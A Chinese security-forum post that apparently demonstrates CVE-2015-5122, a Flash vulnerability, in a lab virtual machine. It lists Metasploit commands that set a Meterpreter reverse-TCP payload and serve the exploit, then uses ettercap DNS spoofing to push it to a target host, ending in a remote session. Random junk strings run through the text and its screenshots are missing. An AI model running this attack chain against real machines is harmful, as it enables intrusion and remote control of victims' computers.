找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1536|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ a2 Q! b3 l# t) q# } 二、cve2015-5122漏洞实例演示虚拟机 4 ~. o! W# i* q9 z& T5 q1 o. p3 R

6 ~" U0 [; W. w; X- L& L- @. j

1 S8 n, D0 K8 k; l* R7 m   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ' s- B5 c+ e0 a. k( R7 `- j/ W- q

) E" q1 X& }1 o9 M. r! K' G

9 Z0 e6 _, C' \- P search cve-2015-5122如图: 2 z5 B6 H4 d' K" R: @

3 _, y) T# U, x8 w5 R( a* ?( O

% l$ V9 W9 h g( ]- |   6 `# c; |3 h" O! D$ d

+ W1 @/ ^( ?( C: b

% h6 |1 [* T$ T! N' J 下面我们敲如下命令: , Y2 r$ R+ G+ v' |( [: ^! p

O) |+ X! u* V& L# L) V

# O, w2 p m7 M: ~) \) K5 j use exploit/multi/browser/adobe_flash_opaque_background_uaf $ m& a+ Y7 W# z

. K0 ^$ B K$ I0 i

4 t: Z% @5 c: Q! W; p# D set PAYLOAD windows/meterpreter/reverse_tcp * H/ @6 Q! e* H) p' w

9 K$ A3 f% e& \/ u# a" ]4 B; F

" Q, h# l" H9 a, T( ~ set LHOST 192.168.0.109 2 H: T6 c5 M# ~ [

9 [2 L7 u9 w9 S* b

5 g: r2 K5 y" R) a+ N1 c7 G+ a set URIPATH /                        /*根目录*/ 3 _) \( X3 g4 n

3 C3 |/ b+ r; g' |) r4 B- b% {! U+ {

0 n) @% O! T. ~, C( i& T set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 3 J4 D8 u2 i/ `! W8 k; t/ p

) X# l, e* F# c5 k" o/ {3 C

+ j: F6 L: B, l- a2 j set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ' d" B/ C D, z" X3 D& b8 W

; U4 ^. P# [3 c- x3 [ o! p

7 t) D- x8 B. A7 p 然后show options如图: ! Z0 |- n* Y B8 Y

' N( C) k6 V& c" ?& Y! U

6 q# W& [' o5 N" t/ d, j+ F: o; m. o f   ) y- M* N$ @: \: t) v5 }$ j9 a

, N3 p/ j- O5 b; ?

. G0 c1 q1 _( e 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
! C$ H+ h: {& L5 l5 y8 S0 E5 t
2 h' p! f3 ~' c' f

2 `' [- I" L7 k' p6 V1 w/ ^9 G

! x8 S6 E+ @4 M2 w4 K& R 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 " d& ~4 B9 W, E' u3 P1 J$ |" W

, N$ k) r! x. H

; W3 @; {' I- b8 L, C Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf ! O1 [& n* m0 Q1 W B/ \6 r" G

3 _( H7 N6 h0 u: U

/ L v9 L: l! U% Q% k   1 Q" H% T* y$ Q$ T% v1 ~

1 ?1 X, \& V2 k; A: P5 G

`4 _5 K- i4 {" o4 T* Z 成功了,这时候我们断开ettercap,如图: 7 t. U2 \: U) w1 ^' T1 M+ e

& h$ ?. Z5 }! Z; @

' Y) ^- z6 r# P3 r2 J; X4 l   : J, Q. O. d& L9 H% [

2 B( ]1 Z4 y3 g4 {9 I {2 I

$ Z5 ^; ? {9 y( D: A% C* v4 ^2 C Screenshot如图: ( u/ Y8 ] S( |; ~! g

/ c( x1 e& q) t; V

( D% {. h' v- g1 R1 C& s/ i   - e" A1 ^! m) A" m* i3 j

% }" }) \# u: s% s: H

; V7 `3 c; o0 J9 |; V- A" B ' j* B: ~' K* _" o) P" N' q

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表